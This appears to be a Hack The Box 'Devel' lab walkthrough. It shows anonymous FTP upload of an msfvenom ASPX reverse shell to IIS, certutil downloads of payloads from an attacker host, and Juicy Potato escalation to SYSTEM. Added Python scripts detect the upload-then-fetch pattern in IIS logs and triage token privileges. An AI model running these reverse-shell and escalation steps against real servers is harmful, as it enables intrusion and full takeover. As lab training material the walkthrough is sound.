Hack The Box - Devel (Without Metasploit)
Configuration
The operating system that I will be using to tackle this machine is a Kali Linux VM.
What I learnt from other writeups is that it is a good habit to map a domain name to the machine's IP address so that it is easier to remember. This can be done by appending a line to /etc/hosts.
$ echo "10.10.10.5 devel.htb" | sudo tee -a /etc/hosts
Reconnaissance
To speed up my recon, I've moved to rustscan. I've also created 2 "aliases" called superscan and resolve.
$ which resolve
resolve () {
cat /etc/hosts | grep --color=auto "$1" | cut -d " " -f 1
}
$ which superscan
superscan () {
name="$(resolve $1)"
rustscan --accessible -a "$name" -r 1-65535 -- -sT -sV -sC -Pn
}
$ superscan devel.htb
File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.10.5:21
Open 10.10.10.5:80
Starting Script(s)
Script to be run Some("nmap -vvv -p ")
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-12 07:57 UTC
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:57
Completed NSE at 07:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:57
Completed NSE at 07:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:57
Completed NSE at 07:57, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 07:57
Completed Parallel DNS resolution of 1 host. at 07:57, 0.47s elapsed
DNS resolution of 1 IPs took 0.47s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 07:57
Scanning 10.10.10.5 [2 ports]
Discovered open port 21/tcp on 10.10.10.5
Discovered open port 80/tcp on 10.10.10.5
Completed Connect Scan at 07:57, 0.01s elapsed (2 total ports)
Initiating Service scan at 07:57
Scanning 2 services on 10.10.10.5
Completed Service scan at 07:57, 6.17s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.5.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:57
NSE: [ftp-bounce 10.10.10.5:21] PORT response: 501 Server cannot accept argument.
Completed NSE at 07:57, 0.93s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:57
Completed NSE at 07:57, 0.07s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:57
Completed NSE at 07:57, 0.00s elapsed
Nmap scan report for 10.10.10.5
Host is up, received user-set (0.0050s latency).
Scanned at 2021-01-12 07:57:14 UTC for 7s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http syn-ack Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:57
Completed NSE at 07:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:57
Completed NSE at 07:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:57
Completed NSE at 07:57, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds
Enumeration (1)
Port 21 Microsoft ftpd
$ ftp devel.htb
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel.htb:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
After connecting to the FTP service, the contents look like they belong to a web server, specifically an IIS server!
Port 80 Microsoft IIS httpd 7.5
A probable guess would be that the content of this IIS service is being shared via FTP, so let's try uploading a file to see whether that is indeed the case.
$ echo "IT WORKS" > test.txt
$ ftp devel.htb
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel.htb:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
10 bytes sent in 0.00 secs (256.9901 kB/s)
$ curl http://devel.htb/test.txt
IT WORKS
Exploitation (1)
Since we now know we can upload files to the IIS service via FTP, we can upload a .aspx file that will establish a reverse shell connection back to us.
$ msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1337 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2714 bytes
$ ftp devel.htb
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel.htb:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> bin
200 Type set to I.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2749 bytes sent in 0.00 secs (1.6730 MB/s)
Now we start a nc listener:
$ nc -lvnp 1337
listening on [any] 1337 ...
And trigger shell.aspx.
$ curl http://devel.htb/shell.aspx
And on our listener, we get a connection.
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.XX,XX] from (UNKNOWN) [10.10.10.5] 49162
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv> whoami
iis apppool\web
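On the defensive side, the chain above (anonymous FTP upload into the web root, then an HTTP request for the uploaded file) leaves two log trails that can be correlated. The following Python script is an added example, not part of the original writeup: it parses IIS W3C-format FTP and web logs by their #Fields header and flags an anonymous STOR of a server-executable file that is then requested over HTTP. The log lines and the 10.10.14.2 client address are constructed samples.

```python
from datetime import datetime

# Constructed sample IIS FTP 7.5 log (W3C format). The parser reads the
# field names from the #Fields header instead of assuming a fixed layout.
FTP_LOG = """#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2021-01-12 07:58:01 10.10.14.2 - 10.10.10.5 21 USER anonymous 331 0 0 1 -
2021-01-12 07:58:01 10.10.14.2 anonymous 10.10.10.5 21 PASS *** 230 0 0 1 /
2021-01-12 07:58:05 10.10.14.2 anonymous 10.10.10.5 21 STOR test.txt 226 0 0 1 /test.txt
2021-01-12 07:59:10 10.10.14.2 anonymous 10.10.10.5 21 STOR shell.aspx 226 0 0 1 /shell.aspx
"""

# Constructed sample IIS web log (W3C format, default field set).
WEB_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2021-01-12 07:58:07 10.10.10.5 GET /test.txt - 80 - 10.10.14.2 curl/7.74.0 200 0 0 3
2021-01-12 07:59:12 10.10.10.5 GET /shell.aspx - 80 - 10.10.14.2 curl/7.74.0 200 0 0 5
"""

# Extensions IIS hands to the ASP/ASP.NET handlers: an anonymous upload of
# one of these into the web root is a code-execution path, not a file drop.
EXEC_EXT = (".aspx", ".asp", ".ashx", ".asmx")

def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))

def find_upload_then_fetch(ftp_text, web_text, window_s=600):
    """Return (user, uri, client-ip, seconds) for every anonymous FTP STOR of
    an executable file that was requested over HTTP within window_s seconds."""
    hits = []
    stores = [r for r in parse_w3c(ftp_text)
              if r["cs-method"] == "STOR" and r["cs-username"] == "anonymous"
              and r["cs-uri-stem"].lower().endswith(EXEC_EXT)]
    gets = list(parse_w3c(web_text))
    for s in stores:
        t_up = datetime.fromisoformat(s["date"] + " " + s["time"])
        for g in gets:
            t_get = datetime.fromisoformat(g["date"] + " " + g["time"])
            delta = (t_get - t_up).total_seconds()
            same_file = g["cs-uri-stem"].lstrip("/") == s["cs-uri-stem"].lstrip("/")
            if same_file and 0 <= delta <= window_s:
                hits.append((s["cs-username"], g["cs-uri-stem"], g["c-ip"], int(delta)))
    return hits

if __name__ == "__main__":
    for hit in find_upload_then_fetch(FTP_LOG, WEB_LOG):
        print("ALERT: anonymous FTP upload executed via HTTP:", hit)
```

The plain test.txt upload is deliberately not flagged; the alert fires only for the .aspx that was fetched two seconds after it was stored.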
Enumeration (2)
If we check out the privileges that iis apppool\web has,
c:\windows\system32\inetsrv> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
we realise that it has the SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege rights. This means we can use Juicy Potato. Since this machine is 32-bit (you can check with systeminfo), we need a 32-bit version of Juicy Potato from here.
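For triage of service accounts like this one, the same whoami /priv table can be parsed rather than read by eye. The following Python is an added example, not part of the original writeup: it parses the fixed-width table into a privilege-to-state map and reports the token-related privileges a defender should review. The sample table is a constructed excerpt in the same shape as the output above.

```python
# Constructed sample of the table printed by `whoami /priv` for an IIS
# application-pool identity (same layout as the output shown above).
WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# Privileges that let a process obtain or act under another security
# context. A web or service account holding any of them should be reviewed.
TOKEN_PRIVS = {
    "SeImpersonatePrivilege": "can impersonate client tokens (what the potato family relies on)",
    "SeAssignPrimaryTokenPrivilege": "can assign a primary token to a new process",
    "SeDebugPrivilege": "can open any process, including SYSTEM ones",
    "SeTcbPrivilege": "acts as part of the operating system",
}

def parse_whoami_priv(text):
    """Return {privilege_name: state} from the `whoami /priv` table."""
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        # Data rows start with an Se* name and end with Enabled/Disabled;
        # header, separator and blank lines do not match this shape.
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1]
    return privs

def triage(text):
    """List held token-related privileges with their state and why they matter.
    'Disabled' only means not active in the current token; the holder can
    enable it, so it is reported the same way as 'Enabled'."""
    held = parse_whoami_priv(text)
    return sorted((name, state, TOKEN_PRIVS[name])
                  for name, state in held.items() if name in TOKEN_PRIVS)

if __name__ == "__main__":
    for name, state, why in triage(WHOAMI_PRIV):
        print(f"REVIEW {name} [{state}]: {why}")
```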
We will also need to use msfvenom to generate a 32-bit reverse shell executable.
$ msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1337 -f exe > reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Exploitation (2)
After transferring both the Juicy Potato executable and our reverse shell executable from our attacker machine via HTTP,
c:\windows\system32\inetsrv> mkdir C:\temp
c:\windows\system32\inetsrv> certutil -f -split -urlcache http://10.10.XX.XX/reverse.exe C:\temp\reverse.exe
**** Online ****
000000 ...
01204a
CertUtil: -URLCache command completed successfully.
c:\windows\system32\inetsrv> certutil -f -split -urlcache http://10.10.XX.XX/juicypotato86.exe C:\temp\juicypotato86.exe
**** Online ****
000000 ...
040600
CertUtil: -URLCache command completed successfully.
we can start our nc listener and run Juicy Potato.
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
C:\temp> juicypotato86.exe -l 1337 -p reverse.exe -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}
Testing {03ca98d6-ff5d-49b8-abc6-03dd84127020} 1337
......
[+] authresult 0
{03ca98d6-ff5d-49b8-abc6-03dd84127020};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
On our listener, we get a connection as SYSTEM!
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.10.5] 49173
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
user.txt
The user flag is located on the desktop of babis.
C:\Users\babis\Desktop> type user.txt.txt
9ecdXXXXXXXXXXXXXXXXXXXXXXXXXXXX
root.txt
The root flag is on Administrator's desktop, as always.
C:\Users\Administrator\Desktop>type root.txt.txt
e621XXXXXXXXXXXXXXXXXXXXXXXXXXXX